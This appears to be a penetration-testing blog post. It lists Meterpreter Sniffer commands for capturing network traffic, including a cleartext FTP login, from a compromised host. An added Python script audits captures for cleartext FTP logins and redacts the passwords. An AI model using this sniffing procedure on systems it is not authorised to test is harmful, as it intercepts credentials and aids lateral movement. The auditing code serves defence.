When you eat a cinnamon roll, don’t you save the center for last? Lick a Tootsie Pop for the chocolate in the middle? Attack (Pentest) a host to gain access to the internal network?
If you answered yes, then you’ll enjoy this quick post. We’ll be using a Metasploit extension, Sniffer. Let’s assume you’ve already compromised your target and have a Meterpreter shell.
Step 1 – Enable Extension = load sniffer
Step 2 – Start sniffing = sniffer_start [interface] [packet buffer]
Step 3 – Monitor Statistics = sniffer_stats [interface]
Step 4 – Log into the host remotely. In this example we are using FTP to keep it simple. We will look at the stats again to see if they increment; notice the increase after the login.
Step 5 – Download the packet captures = sniffer_dump [interface] [filename]
Step 6 – Open downloaded file in Wireshark and look for sensitive information.
Step 7 – Stop sniffer = sniffer_stop [interface]
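The FTP login in Step 4 is readable in the capture because FTP sends USER and PASS in clear text. As an added example (not part of the original post or of Metasploit), here is a defender-side audit that lists which client/server pairs in a capture still log in over plain FTP, with the password redacted. It assumes a classic pcap file with Ethernet framing; the function names and the sample traffic are constructed for illustration.

```python
import struct

def _frame(src, dst, sport, dport, payload):
    # Constructed Ethernet/IPv4/TCP frame; checksums are left at zero.
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, bytes(src), bytes(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp

def build_sample_pcap():
    # Constructed capture: one FTP login from 10.0.0.5 to 10.0.0.20.
    client, server = (10, 0, 0, 5), (10, 0, 0, 20)
    frames = [_frame(client, server, 40000, 21, b"USER alice\r\n"),
              _frame(server, client, 21, 40000, b"331 Password required\r\n"),
              _frame(client, server, 40000, 21, b"PASS example-password\r\n")]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # classic pcap header
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out

def find_cleartext_ftp_logins(pcap):
    """Return (client, server, verb, value) for FTP logins sent in the clear."""
    order = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap[:4])
    if order is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(order + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    findings, off = [], 24
    while off + 16 <= len(pcap):
        incl = struct.unpack(order + "I", pcap[off + 8:off + 12])[0]
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        # Keep only IPv4 (ethertype 0x0800) carrying TCP (protocol 6).
        if len(frame) < 54 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue
        tcp = frame[14 + (frame[14] & 0x0F) * 4:]
        if len(tcp) < 20 or struct.unpack("!H", tcp[2:4])[0] != 21:
            continue  # not sent to the FTP control port
        verb, _, arg = tcp[(tcp[12] >> 4) * 4:].strip().partition(b" ")
        verb = verb.upper().decode("ascii", "replace")
        if verb in ("USER", "PASS"):
            ip = lambda b: ".".join(map(str, b))
            # Report that a password crossed the wire, never the password itself.
            value = "<redacted, %d bytes>" % len(arg) if verb == "PASS" else arg.decode("ascii", "replace")
            findings.append((ip(frame[26:30]), ip(frame[30:34]), verb, value))
    return findings

if __name__ == "__main__":
    for finding in find_cleartext_ftp_logins(build_sample_pcap()):
        print(finding)
```

Any pair this reports is a candidate for moving to SFTP or FTPS, since the same login is visible to whoever can capture on a host along the path.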
This is a very simple example, but think of the possibilities. We tend to have a warm and fuzzy feeling inside our networks since we are behind a firewall and have layers of security. As you’ll see, there are other attacks that can pivot from your compromised hosts. Again, comments and suggestions welcome.